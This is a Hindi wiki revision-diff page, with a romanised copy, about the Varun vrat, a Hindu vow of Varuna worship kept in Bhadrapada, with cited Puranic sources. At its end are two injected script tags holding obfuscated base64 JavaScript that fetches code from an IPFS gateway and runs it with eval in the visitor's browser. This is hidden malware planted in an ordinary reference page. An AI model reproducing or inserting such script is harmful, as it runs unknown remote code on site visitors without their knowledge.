Difference between revisions of "वरुण व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
*यह व्रत [[भाद्रपद]] के आरम्भ से [[पूर्णिमा]] तक करना चाहिए।  
 
*यह व्रत [[भाद्रपद]] के आरम्भ से [[पूर्णिमा]] तक करना चाहिए।  
 
*इसमें [[वरुण देवता|वरुण]] पूजा करनी चाहिए।  
 
*इसमें [[वरुण देवता|वरुण]] पूजा करनी चाहिए।  
*अन्त में छ़त्र, चप्पलों एवं दो वस्त्रों के साथ में जलधेनु का दान करना चाहिए। 'जलधेनु' शब्द<ref>[[अनुशासन पर्व महाभारत|अनुशासनपर्व]] (71|41) एवं [[मत्स्य पुराण]] (53|13)</ref> में भी प्रयुक्त हुआ है।  
+
*अन्त में छ़त्र, चप्पलों एवं दो वस्त्रों के साथ में जलधेनु का दान करना चाहिए।
 +
*'जलधेनु' शब्द<ref>[[अनुशासन पर्व महाभारत|अनुशासनपर्व]] (71|41) एवं [[मत्स्य पुराण]] (53|13)</ref> में भी प्रयुक्त हुआ है।  
 
*यदि कोई रात्रि भर पानी में खड़ा होकर दूसरे दिन प्रात: गौ दान करता है तो वह वरुण लोक को जाता है।<ref>कृत्यकल्पतरु (व्रतखण्ड 450, 52वाँ षष्ठी व्रत); हेमाद्रि (व्रतखण्ड 2, 905, [[पद्म पुराण]] से उद्धरण); [[मत्स्य पुराण]] (101|74); विष्णुधर्मोत्तरपुराण (3|195|1-3)</ref>  
 
*यदि कोई रात्रि भर पानी में खड़ा होकर दूसरे दिन प्रात: गौ दान करता है तो वह वरुण लोक को जाता है।<ref>कृत्यकल्पतरु (व्रतखण्ड 450, 52वाँ षष्ठी व्रत); हेमाद्रि (व्रतखण्ड 2, 905, [[पद्म पुराण]] से उद्धरण); [[मत्स्य पुराण]] (101|74); विष्णुधर्मोत्तरपुराण (3|195|1-3)</ref>  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 06:08, 11 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat bhadrapad ke arambh se poornima tak karana chahie.
  • isamean varun pooja karani chahie.
  • ant mean chh़tr, chappaloan evan do vastroan ke sath mean jaladhenu ka dan karana chahie.
  • 'jaladhenu' shabd[1] mean bhi prayukt hua hai.
  • yadi koee ratri bhar pani mean kh da hokar doosare din prat: gau dan karata hai to vah varun lok ko jata hai.[2]
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. anushasanaparv (71|41) evan matsy puran (53|13)
  2. krityakalpataru (vratakhand 450, 52vaan shashthi vrat); hemadri (vratakhand 2, 905, padm puran se uddharan); matsy puran (101|74); vishnudharmottarapuran (3|195|1-3)

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>